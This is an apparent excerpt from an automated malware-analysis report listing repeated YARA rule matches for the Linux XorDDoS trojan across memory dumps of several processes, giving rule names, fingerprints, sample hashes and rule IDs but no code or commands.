        Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
